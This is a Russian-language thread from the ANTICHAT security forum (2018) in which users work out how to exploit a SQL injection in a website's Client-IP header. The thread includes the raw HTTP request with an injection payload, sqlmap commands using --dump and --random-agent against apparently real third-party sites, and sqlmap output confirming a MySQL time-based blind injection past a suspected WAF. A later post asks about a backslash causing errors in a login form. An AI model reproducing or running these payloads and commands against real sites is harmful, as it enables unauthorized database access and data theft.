ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

28.05.2018, 01:19
|
|
Guest
Сообщений: n/a
Провел на форуме: 104689
Репутация:
1
|
|
Первый раз подобный отчёт об SQL
Как прописать запрос в SQLmap ?
Код:
Code:
GET / HTTP/1.1
Referer: http://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.28.0 Safari/5.21
Client-IP: -1' OR 3*2*1=6 AND 000358=000358 or 'tPXGszqn'='
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: localhost
Accept-Language: en
Via: 1.1 wa.www.test.com
Origin: http://www.test.com/
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=2vd8jk6geog2vc0jjem1bbre3g; 05b80234f058b57f104d29b9e=2a31939b37875a015fb294ffca58d009
Host: site.com (тут сайт который я проверял)
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
|
|
|
|

28.05.2018, 01:26
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
Сообщение от Sensoft
Sensoft said:
↑
Первый раз подобный отчёт об SQL
Как прописать запрос в SQLmap ?
Код:
Code:
GET / HTTP/1.1
Referer: http://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.28.0 Safari/5.21
Client-IP: -1' OR 3*2*1=6 AND 000358=000358 or 'tPXGszqn'='
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: localhost
Accept-Language: en
Via: 1.1 wa.www.test.com
Origin: http://www.test.com/
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=2vd8jk6geog2vc0jjem1bbre3g; 05b80234f058b57f104d29b9e=2a31939b37875a015fb294ffca58d009
Host: site.com (тут сайт который я проверял)
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
--headers='client-ip:*'
|
|
|
|

28.05.2018, 01:41
|
|
Guest
Сообщений: n/a
Провел на форуме: 104689
Репутация:
1
|
|
Сообщение от BabaDook
BabaDook said:
↑
--headers='client-ip:*'
Код:
Code:
sqlmap -u https://sote.io/ --headers='client-ip:*' --dump --random-agent
Не прокатило
|
|
|
|

28.05.2018, 01:43
|
|
Guest
Сообщений: n/a
Провел на форуме: 104689
Репутация:
1
|
|
Сообщение от BabaDook
BabaDook said:
↑
--headers='client-ip:*'
Ноооооооооооо
Код:
Code:
sqlmap -u site.ru --headers="Client-IP: -1' OR 3*2*1=6 AND 000358=000358 or 'tPXGszqn'='" --dump --random-agent
Так что то пошло
Код:
Code:
[00:41:28] [INFO] (custom) HEADER parameter 'Client-IP #1*' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable
|
|
|
|

28.05.2018, 01:53
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
Сообщение от Sensoft
Sensoft said:
↑
Код:
Code:
sqlmap -u https://sote.io/ --headers='client-ip:*' --dump --random-agent
Не прокатило
возможно из за --headers='client-ip:*' отсутствие пробела . Возможно так надо было --headers='client-ip: *', вообще должно было. Но не суть, так или иначе всё робит. раскрутил же
|
|
|
|

28.05.2018, 01:58
|
|
Guest
Сообщений: n/a
Провел на форуме: 104689
Репутация:
1
|
|
Сообщение от BabaDook
BabaDook said:
↑
возможно из за --headers='client-ip:*' отсутствие пробела . Возможно так надо было --headers='client-ip: *', вообще должно было. Но не суть, так или иначе всё робит. раскрутил же
Почти сдвиг есть в хорошую сторону
там кажись waf (
Ошибки есть пока что крутит BD
Код:
Code:
[00:41:56] [INFO] checking if the injection point on (custom) HEADER parameter 'Client-IP #1*' is a false positive
[00:42:26] [WARNING] there is a possibility that the target (or WAF/IPS/IDS) is dropping 'suspicious' requests
(custom) HEADER parameter 'Client-IP #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 97 HTTP(s) requests:
---
Parameter: Client-IP #1* ((custom) HEADER)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: -1' OR 3 AND SLEEP(5)-- TZaC21=6 AND 000358=000358 or 'tPXGszqn'='
---
[00:43:36] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
[00:43:36] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries [00:43:36] [INFO] fetching current database
[00:43:36] [INFO] retrieved:
[00:43:36] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prev nt potential disruptions
[00:46:21] [ERROR] invalid character detected. retrying..
there seems to be a continuous problem with connection to the target. Are you sure that you want to continue with further
arget testing? [y/N]
спасибо тебе, чётко помог.
|
|
|
|

01.06.2018, 02:50
|
|
Guest
Сообщений: n/a
Провел на форуме: 104689
Репутация:
1
|
|
SQLmap не может спалить дыру
Код:
Code:
POST /dologin HTTP/1.1
Content-Length: 35
Content-Type: application/x-www-form-urlencoded
Referer: https://site
Cookie: __cfduid=d5b944bc8a46493b7f7457c33594555a21527803716; PHPSESSID=tcbac2uoac16f1rog3anmocn46
Host: site
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
email=%5c&password=g00dPa%24%24w0rD
я так понимаю всё и за %5c \с ней тоже дырка появляется
если убрать дырка исчезает
кто сталкивался ?
|
|
|
|

01.06.2018, 04:08
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
Может КФ не дает? мало данных подробней надо
|
|
|
|

01.06.2018, 04:14
|
|
Guest
Сообщений: n/a
Провел на форуме: 104689
Репутация:
1
|
|
Сообщение от BabaDook
BabaDook said:
↑
Может КФ не дает? мало данных подробней надо
лс чекни
|
|
|
|

01.06.2018, 18:51
|
|
Guest
Сообщений: n/a
Провел на форуме: 56255
Репутация:
2
|
|
Сообщение от Sensoft
Sensoft said:
↑
SQLmap не может спалить дыру
Код:
Code:
POST /dologin HTTP/1.1
Content-Length: 35
Content-Type: application/x-www-form-urlencoded
Referer: https://site
Cookie: __cfduid=d5b944bc8a46493b7f7457c33594555a21527803716; PHPSESSID=tcbac2uoac16f1rog3anmocn46
Host: site
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
email=%5c&password=g00dPa%24%24w0rD
я так понимаю всё и за %5c
\
с ней тоже дырка появляется
если убрать дырка исчезает
кто сталкивался ?
Было не раз такое.
Похоже что это не скуля, а просто ошибка.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|